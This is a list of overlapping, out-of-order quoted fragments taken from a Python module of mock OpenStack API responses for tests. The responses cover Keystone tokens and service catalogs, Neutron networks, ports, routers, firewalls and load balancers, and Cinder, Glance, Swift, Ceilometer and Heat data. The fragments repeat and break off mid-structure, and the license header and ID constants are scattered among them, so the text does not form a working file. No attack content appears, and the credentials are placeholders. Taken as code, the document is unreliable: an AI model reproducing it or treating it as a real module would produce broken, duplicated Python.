"\"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\":",
"\"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\":",
"\"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups':",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\":",
"Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0',",
"PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\":",
"\"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"\"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ {",
"} ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\":",
"\"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False },",
"14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\":",
"ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT",
"\"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" }",
"} VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description':",
"\"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member",
"}, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\",",
"'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled':",
"\"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = {",
"\"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\":",
"'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id':",
"\"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ {",
"AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby',",
"-1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [",
"PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID,",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"CONDITIONS OF ANY KIND, either express or implied. See the # License for",
"METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints':",
"{ \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1,",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\":",
"{ 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT,",
"\"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"#!/usr/bin/env python # -*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt",
"[ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'},",
"\"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\":",
"\"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\":",
"\"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\":",
"] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\":",
"\"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\":",
"'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}],",
"u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links':",
"{ \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0],",
"0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\",",
"\"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] }",
"ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\":",
"\"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\":",
"[ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None,",
"\"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\":",
"[ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\":",
"True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\",",
"0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"",
"\"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\",",
"\"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None,",
"= '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT =",
"LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS =",
"compliance with the License. You may obtain # a copy of the License",
"ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS =",
"\"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second",
"\"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": {",
"\"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\",",
"-1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\",",
"}, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}],",
"= '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL =",
"[\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\",",
"ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href':",
"\"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\":",
"None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID,",
"{ \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\":",
"u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size':",
"\"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = { \"servers\": [ {",
"\"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST =",
"u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel':",
"[ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\":",
"\"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS =",
"\"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False,",
"'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT,",
"[{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2",
"{ 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\":",
"ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id':",
"} ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\",",
"'<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\"",
"may # not use this file except in compliance with the License. You",
"\"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\":",
"True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, {",
"[], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\":",
"\"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\",",
"{ 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\":",
"{ u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup',",
"PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\",",
"\"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\":",
"ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\":",
"\"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\":",
"backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST",
"True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall",
"\"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\":",
"], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\"",
"\"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = {",
"\"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\",",
"FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\":",
"{ 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\":",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"\"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net'",
"\"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\"",
"\"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\":",
"\"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {},",
"[ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\":",
"\"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\",",
"u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\":",
"[\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"]",
"\"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\":",
"{ \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom",
"ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\":",
"\"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\":",
"\"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\",",
"4, \"shared\": False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None,",
"\"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST =",
"} LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5,",
"Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT,",
"False }, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None,",
"\"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True,",
"\"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID",
"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID",
"PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT,",
"\"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, {",
"\"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0,",
"{ 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID,",
"\"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\"",
"\"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\":",
"'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region':",
"\"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"\"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\":",
"\"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\":",
"\"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [],",
"'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None,",
